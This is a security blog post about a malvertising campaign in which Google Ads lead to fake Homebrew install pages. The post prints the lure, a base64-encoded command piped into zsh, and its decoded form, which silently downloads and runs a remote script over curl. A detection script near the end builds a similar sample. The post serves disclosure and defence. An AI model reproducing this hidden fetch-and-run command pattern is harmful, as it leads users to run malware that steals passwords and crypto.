The AI-powered scam content army is here, and it's buying Google Ads.
I don't mean the usual SEO slop, like the "Top 10 Best Ways to Optimize Your Workflow in 2026" stuff that clutters every search result. I mean professionally generated, technically convincing pages designed to trick developers into running malware on their machines, funded by hijacked ad accounts from real businesses in multiple countries, and rotating across platforms faster than they can be reported.
Here's how I stumbled into one.
The Search
I was messing around with Claude's Chrome extension, and I happened to be in a fresh Chrome session with no extensions, no ad blocker, no customization. I needed to update some Homebrew packages, and since I was already in vanilla Chrome, I just Googled it: "brew upgrade packages."
The first result was sponsored. It pointed to HackMD, which is a real notes platform. I clicked it and got a page titled "Terminal-Based macOS Deployment." It immediately looked like clean AI slop, from the formatting and tone to the subsections about "System Advantages" and "Native Optimization." It even name-dropped Gatekeeper and SIP (actual macOS security features), as if this page was helping you stay secure.
The installation command gave it away:
echo 'ZWNobyAnSW5zdGFsbGluZyBwYWNr...'|base64 -D|zsh
If you're not a developer, that's a bunch of gibberish. If you are, every alarm in your brain should fire. That's a base64-encoded string being decoded and piped directly into your shell. You literally cannot read what it does before you run it.
I decoded it. Here's what it actually says:
echo 'Installing package please wait...' && curl -kfsSL http://[malware-server]/curl/[hash]|zsh
It prints a friendly "Installing package please wait..." message, then silently downloads a script from a remote server and executes it immediately. The -kfsSL flags on curl suppress all output and ignore SSL certificate errors.
This is a textbook virus.
The Investigation
The HackMD account that published the page was called "mac specs" with the username @sXss8fsSQ62Kehf5H3lirw, random characters, obviously generated. Created February 19, 2026. Three days before I found it. No other published notes.
Google requires advertisers to verify their identity, and you can look up any advertiser in the Google Ads Transparency Center. The ad was paid for by Enexum SA, based in Chile.
My first thought was that it's a shell company. But I looked them up, and they're a real ad agency in Santiago. Their ad account had probably been hijacked.
I reported the ad to Google, and to HackMD. The next morning, I searched the same thing again.
I got a new sponsored result on a different platform, Craft.md. It was an identical page template, word for word.
This time, someone had managed to leave a comment on the Craft page:
"THIS IS A VIRUS, STEALS PASSWORDS AND CRYPTO"
I checked the Transparency Center again. This ad was paid for by GRUPO EON AMERICA S.A.S., based in Argentina. And when I looked them up, their Transparency Center page showed 28 active ads, most of them normal campaigns for an Argentine supermarket chain.
So it was the same pattern of a hijacked agency account, with verified identity inherited.
I emailed both companies to let them know their accounts were likely compromised.
What's Actually Happening Here
This is AI slop being trivially abused and it kinda shocks me how simple and brazen it is.
They used the right terminology, the right formatting, and the right tone to exploit the fact that developers are already primed to copy commands from the internet and paste them into their terminals. The scam doesn't need you to download a file or click a suspicious link. It just needs you to do the thing you were already going to do.
What You Should Do
Stop using sponsored search results. Just don't click them. The real documentation will always rank organically. Better yet, use a search engine that doesn't show sponsored results at all. I use Kagi, which is paid and ad-free. If I'd been in my normal setup instead of a bare Chrome session, I never would have seen this ad in the first place.
Learn what AI-generated scam content looks like. It has a samey quality: overly polished, generically professional, and weirdly confident about everything. Phrases like "Professional-grade installation via Terminal ensures a direct, high-speed integration with the macOS architecture" sound impressive but say nothing. Real documentation doesn't talk like that. If a technical guide reads like a marketing brochure, be suspicious.
Stick to real sources. When you're looking for how to use a CLI tool, go to the official docs. For Homebrew, that's brew.sh. If the source is a content-hosting platform rather than the project's own documentation, ask yourself why.
Check the comments. If you do end up on a platform that allows comments, look at them. Sometimes the best security advisory is the bluntest one.
Never run base64-encoded commands from the internet. If someone is hiding what a command does, there's a reason.
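To see what a one-liner like the one in "The Search" hides without running it, the sketch below (an added example, not part of the original post) treats the pasted command purely as text, decodes any base64 token in it, and flags a decoder or a download that is piped into a shell. The function names decode_paste and audit_paste, the sample payload and the .invalid host are constructed for illustration, and the patterns are heuristics rather than a complete detector.

```shell
#!/bin/sh
# Added example, not from the original post. Nothing pasted is ever executed:
# the command is handled as text, decoded, and pattern-matched.

# A pipe whose right-hand side is a shell interpreter (|sh, | bash, |zsh ...).
PIPE_TO_SHELL='\|[[:space:]]*(sudo[[:space:]]+)?(/[a-z/]*/)?(sh|bash|zsh|dash|ksh)([[:space:]]|$)'

# Print the plaintext of every base64-looking token in the pasted command.
decode_paste() (
    printf '%s\n' "$1" |
    grep -oE '[A-Za-z0-9+/]{16,}={0,2}' |
    while IFS= read -r blob; do
        # --decode works with GNU and macOS base64; -D is the macOS short form.
        if text=$(printf '%s' "$blob" | base64 --decode 2>/dev/null); then
            printf '%s\n' "$text"
        fi
    done
)

# Print one finding per line; empty output means nothing was flagged.
audit_paste() (
    cmd=$1
    # Layer 1: the visible command decodes a blob straight into an interpreter.
    if printf '%s\n' "$cmd" |
        grep -qE "base64[[:space:]]+(-d|-D|--decode).*$PIPE_TO_SHELL"; then
        echo 'decoded-blob-piped-to-shell'
    fi
    # Layer 2: what the blob says once decoded.
    decoded=$(decode_paste "$cmd")
    if printf '%s\n' "$decoded" | grep -qE "(curl|wget)[[:space:]].*$PIPE_TO_SHELL"; then
        echo 'hidden-download-piped-to-shell'
    fi
    if printf '%s\n' "$decoded" | grep -qE 'curl[[:space:]]+-[A-Za-z]*k|--insecure'; then
        echo 'tls-verification-disabled'
    fi
)

# Constructed sample shaped like the lure in the post; host and path are placeholders.
PAYLOAD="echo 'Installing package please wait...' && curl -kfsSL http://malware-server.invalid/curl/PLACEHOLDER|zsh"
SAMPLE="echo '$(printf '%s' "$PAYLOAD" | base64 | tr -d '\n')'|base64 -D|zsh"

printf 'Decoded payload:\n%s\nFindings:\n' "$(decode_paste "$SAMPLE")"
audit_paste "$SAMPLE"
```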
Stay skeptical out there.
After publishing this, I looked into whether anyone else had documented the same thing. It turns out this is a well-known, ongoing campaign that the security community has been tracking for over a year.
In January 2025, BleepingComputer reported on fake Homebrew Google Ads that redirected from the real "brew.sh" URL to a lookalike domain "brewe.sh." Homebrew's project leader responded publicly, essentially saying there was nothing they could do and that Google keeps taking money from scammers.
By October 2025, researchers had identified over 85 domains impersonating Homebrew, LogMeIn, and TradingView, all using the same base64 technique through Google Ads.
And just this month, the campaign expanded to abusing AI platforms directly. AdGuard documented attackers creating public artifacts on claude.ai with fake Homebrew install instructions, then buying Google Ads pointing to them. Because the ad shows the trusted claude.ai domain, users are even more likely to click. BleepingComputer confirmed the campaign also uses fake Apple Support pages on Medium, and that over 15,000 users viewed the malicious content. The search queries being targeted go beyond Homebrew to include "online DNS resolver" and "macOS CLI disk space analyzer."
So the HackMD and Craft pages I found are one arm of a much larger operation. The security community calls the technique "ClickFix"... and it's not slowing down.